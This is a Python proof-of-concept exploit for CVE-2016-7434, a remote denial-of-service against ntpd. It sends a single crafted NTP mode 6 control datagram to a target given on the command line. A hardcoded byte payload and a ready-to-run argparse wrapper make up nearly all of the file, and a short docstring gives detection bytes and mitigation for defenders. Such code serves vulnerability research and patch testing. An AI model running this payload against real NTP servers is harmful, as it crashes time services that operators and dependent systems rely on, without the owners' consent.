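#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CVE-2016-7434 ntpd remote DOS
by opsxcq (github.com/opsxcq/)

Proof-of-concept that sends a single crafted NTP control (mode 6) datagram
to an ntpd instance over UDP.  No reply is read, so the script cannot tell
whether the daemon was affected; check the ntpd process on the test host
after running it.

Defender notes:
  * Detection: the datagram begins with the bytes 0x16 0x0a (NTP version 2,
    mode 6, opcode 10) followed by an ASCII variable list that starts with
    "nonce, laddr=[]:".  Mode 6 queries arriving from hosts that are not
    monitoring stations are worth alerting on in general.
  * Mitigation: run an ntpd release that contains the fix for
    CVE-2016-7434, and refuse mode 6 queries from hosts that do not need
    them (`restrict ... noquery` in ntp.conf).
"""

from sys import argv, exit
import socket
from argparse import ArgumentParser

# Standard NTP service port, used when -p/--port is not given.  Without a
# default, argparse hands over None and sendto() fails with a TypeError that
# the IOError handler below does not catch.
NTP_PORT = 123

# 12-byte control header followed by the request data, byte-for-byte as
# published.  Kept as a bytes literal: socket.sendto() rejects text strings
# on Python 3, and bytes literals behave the same on Python 2.
PAYLOAD = (
    b"\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36"
    b"\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
)


def exploit(target, port):
    """Send the CVE-2016-7434 test datagram to ``target:port`` over UDP.

    Args:
        target: IPv4 address (or resolvable name) of the ntpd host under test.
        port: UDP port ntpd listens on.

    Raises:
        IOError: if the datagram cannot be sent (for example an
            unresolvable host); on Python 3 this is the same class as
            OSError.

    The function only transmits; it does not wait for or inspect a reply.
    """
    # Create a datagram socket (IPv4 only, as in the original PoC).
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.sendto(PAYLOAD, (target, port))
    finally:
        # Release the descriptor even when sendto() raises.
        sock.close()
    print("[+] Exploit sent, please test the target\n")


if __name__ == "__main__":
    ap = ArgumentParser(description="CVE-2016-7434 ntpd remote DOS")
    ap.add_argument("-t", "--target", required=True, help="Target's IP address")
    ap.add_argument("-p", "--port", required=False, type=int, default=NTP_PORT,
                    help="port where ntpd is running")
    args = vars(ap.parse_args())
    try:
        print("[*] Starting CVE-2016-7434 ntpd remote DOS")
        exploit(args["target"], args["port"])
    except IOError:
        exit("[!] Error sending packets")
    except KeyboardInterrupt:
        print("\n[*] Stopping the exploit")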